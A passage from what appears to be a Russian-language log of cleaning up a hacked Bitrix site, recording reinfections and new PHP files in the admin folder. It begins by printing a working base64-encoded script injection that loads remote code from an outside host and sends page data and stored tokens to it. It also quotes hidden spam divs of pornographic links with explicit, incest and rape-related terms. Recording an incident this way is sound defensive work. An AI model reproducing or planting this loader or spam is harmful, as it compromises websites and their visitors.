J0cGpqcnhqS01CRyk7CiAgICB9CiAgICBpZiAodHlwZW9mIF94d0NqTDNxcVF6M0JnVEpOICE9PSAndW5kZWZpbmVkJyAmJiBfeHdDakwzcXFRejNCZ1RKTiAmJiB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudW5pcXVlKSB7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZ0b2tlbj0nICsgZW5jb2RlVVJJQ29tcG9uZW50KF94d0NqTDNxcVF6M0JnVEpOKTsKICAgIH0KICAgIGlmICgnJyAhPT0gJycpIHsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmJ5cGFzc19jYWNoZT0nOwogICAgfQogICAgdmFyIGEgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICAgICAgICBhLnR5cGUgPSAnYXBwbGljYXRpb24vamF2YXNjcmlwdCc7CiAgICAgICAgYS5zcmMgPSB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcuUl9QQVRIICsgX3JGRGtOV1M3eUtKNzR5Q1A7CiAgICB2YXIgcyA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdzY3JpcHQnKVswXTsKICAgIHMucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoYSwgcykKICAgIH0pKCk7CiAgICA="></script><script src="data:text/javascript;base64,CiAgICAoZnVuY3Rpb24oKSB7CiAgICB2YXIgbmFtZSA9ICdfZHNITXlGaHlYWXc4cWh4Zyc7CiAgICBpZiAoIXdpbmRvdy5fZHNITXlGaHlYWXc4cWh4ZykgewogICAgICAgIHdpbmRvdy5fZHNITXlGaHlYWXc4cWh4ZyA9IHsKICAgICAgICAgICAgdW5pcXVlOiBmYWxzZSwKICAgICAgICAgICAgdHRsOiA4NjQwMCwKICAgICAgICAgICAgUl9QQVRIOiAnaHR0cHM6Ly9iYnRycmFjay5nbG9iYWwuc3NsLmZhc3RseS5uZXQvVDQ5THN3JywKICAgICAgICB9OwogICAgfQogICAgY29uc3QgX215WUNrR0RNUDlqcU5DRHQgPSBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgnY29uZmlnJyk7CiAgICBpZiAodHlwZW9mIF9teVlDa0dETVA5anFOQ0R0ICE9PSAndW5kZWZpbmVkJyAmJiBfbXlZQ2tHRE1QOWpxTkNEdCAhPT0gbnVsbCkgewogICAgICAgIHZhciBfS1BxczhnWDZQWGdOVGgzViA9IEpTT04ucGFyc2UoX215WUNrR0RNUDlqcU5DRHQpOwogICAgICAgIHZhciBfUDhEWUJCczlZOVBIU3RNNiA9IE1hdGgucm91bmQoK25ldyBEYXRlKCkvMTAwMCk7CiAgICAgICAgaWYgKF9LUHFzOGdYNlBYZ05UaDNWLmNyZWF0ZWRfYXQgKyB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudHRsIDwgX1A4RFlCQnM5WTlQSFN0TTYpIHsKICAgICAgICAgICAgbG9jYWxTdG9yYWdlLnJlbW92ZUl0ZW0oJ3N1YklkJyk7CiAgICAgICAgICAgIGxvY2FsU3RvcmFnZS5yZW1vdmVJdGVtKCd0b2tlbicpOwogICAgICAgICAgICBsb2NhbFN0b3JhZ2UucmVtb3ZlSXRlbSgnY29uZmlnJyk7CiAgICAgICAgfQogICAgfQogICAgdmFyIF93R3AycnRwampyeGpLTUJHID0gbG9jYWxTdG9yYWdlLmdldEl0ZW0oJ3N1YklkJyk7CiAgICB2YXIgX3h3Q2pMM3FxUXozQmdUSk4gPSBsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgndG9rZW4nKTsKICAgIHZhciBfckZEa05XUzd5S0o3NHlDUCA9ICc/cmV0dXJuPWpzLmNsaWVudCc7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyYnICsgZGVjb2RlVVJJQ29tcG9uZW50KHdpbmRvdy5sb2NhdGlvbi5zZWFyY2gucmVwbGFjZSgnPycsICcnKSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZzZV9yZWZlcnJlcj0nICsgZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LnJlZmVycmVyKTsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmRlZmF1bHRfa2V5d29yZD0nICsgZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LnRpdGxlKTsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmxhbmRpbmdfdXJsPScgKyBlbmNvZGVVUklDb21wb25lbnQoZG9jdW1lbnQubG9jYXRpb24uaG9zdG5hbWUgKyBkb2N1bWVudC5sb2NhdGlvbi5wYXRobmFtZSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZuYW1lPScgKyBlbmNvZGVVUklDb21wb25lbnQobmFtZSk7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZob3N0PScgKyBlbmNvZGVVUklDb21wb25lbnQod2luZG93Ll9kc0hNeUZoeVhZdzhxaHhnLlJfUEFUSCk7CiAgICBpZiAodHlwZW9mIF93R3AycnRwampyeGpLTUJHICE9PSAndW5kZWZpbmVkJyAmJiBfd0dwMnJ0cGpqcnhqS01CRyAmJiB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudW5pcXVlKSB7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZzdWJfaWQ9JyArIGVuY29kZVVSSUNvbXBvbmVudChfd0dwMnJ0cGpqcnhqS01CRyk7CiAgICB9CiAgICBpZiAodHlwZW9mIF94d0NqTDNxcVF6M0JnVEpOICE9PSAndW5kZWZpbmVkJyAmJiBfeHdDakwzcXFRejNCZ1RKTiAmJiB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcudW5pcXVlKSB7CiAgICAgICAgX3JGRGtOV1M3eUtKNzR5Q1AgKz0gJyZ0b2tlbj0nICsgZW5jb2RlVVJJQ29tcG9uZW50KF94d0NqTDNxcVF6M0JnVEpOKTsKICAgIH0KICAgIGlmICgnJyAhPT0gJycpIHsKICAgICAgICBfckZEa05XUzd5S0o3NHlDUCArPSAnJmJ5cGFzc19jYWNoZT0nOwogICAgfQogICAgdmFyIGEgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICAgICAgICBhLnR5cGUgPSAnYXBwbGljYXRpb24vamF2YXNjcmlwdCc7CiAgICAgICAgYS5zcmMgPSB3aW5kb3cuX2RzSE15Rmh5WFl3OHFoeGcuUl9QQVRIICsgX3JGRGtOV1M3eUtKNzR5Q1A7CiAgICB2YXIgcyA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdzY3JpcHQnKVswXTsKICAgIHMucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoYSwgcykKICAgIH0pKCk7CiAgICA="></script>
				
			

Удаление этого кода оставило сайт работоспособным. Но почему-то SUCURi все еще видит инъекцию в коде. Возможно это кеш.

2024-11-27

В /bitrix/header.php снова появился код. И похоже его стало больше.

Кроме этого нашел в папке /bitrix/admin/ вновь созданные файлы как со смысловым именем типа info.php так и с набором символов в имени вроде bkzjx2r67.php 

2024-11-30

Нашел инъекцию в файле /local/templates/»your template»/footer.php

Три вставленных DIV со свойством display:none

				
					<div style="display: none;">
sexy video download picture <a href="https://zatube.mobi" rel="dofollow" title="zatube.mobi">zatube.mobi</a> indian xvideo porn
hentai good girl <a href="https://www.hentaimangaz.com/" target="_self">hentaimangaz.com</a> female deku hentai
probinsyano july 9 2018 <a href="https://philteleserye.com/" target="_blank">philteleserye.com</a> andrew schimmer wife update today
ana maria cordoba nude <a href="https://www.pornpakistani.com" target="_blank" title="pornpakistani.com">pornpakistani.com</a> kumaraswamy radhika
kancolle collection hentai <a href="https://www.hentaisa.com/" target="_self">hentaisa.com</a> rape mod
</div>

<div style="display: none;">
بزاز جمده <a href="https://www.hardpornovideos.com/" rel="dofollow" title="hardpornovideos.com سكس حمار ينيك بنت">hardpornovideos.com</a> مصراوي سكس
فيلم سكس مايا خليفه <a href="https://maffnet.org/" target="_self" title="maffnet.org المحروسة سكس">maffnet.org</a> فيلم سكس محارم
سكسبنات <a href="https://superamateurtube.com/" target="_self">superamateurtube.com</a> نيك كوري
افلام كورية سكس <a href="https://www.felltube.com/" rel="dofollow" target="_blank" title="felltube.com صور بنات سحاقيات">felltube.com</a> جنس مترجم عربي
chunibyo hentai <a href="https://www.hentaiweb.net/" rel="dofollow" target="_blank">hentaiweb.net</a> kukaku shiba hentai
</div>

<div style="display: none;">
راهبه تتناك <a href="https://hihitube.com/" target="_self" title="hihitube.com">hihitube.com</a> نيك مترجم محارم
sssmovies <a href="https://yourporn.name" target="_blank">yourporn.name</a> south indian aunty fucking
indan six video <a href="https://xxxindianporn.org/" rel="dofollow" title="xxxindianporn.org">xxxindianporn.org</a> xhamaster hd
xxxin <a href="https://tubeporncity.info" rel="dofollow" title="tubeporncity.info">tubeporncity.info</a> tub 99.com
bangladeshxvideo <a href="https://gotporn.mobi" title="gotporn.mobi">gotporn.mobi</a> forced mom sex
</div>
				
			

Вспомогательные ссылки

Добавить комментарий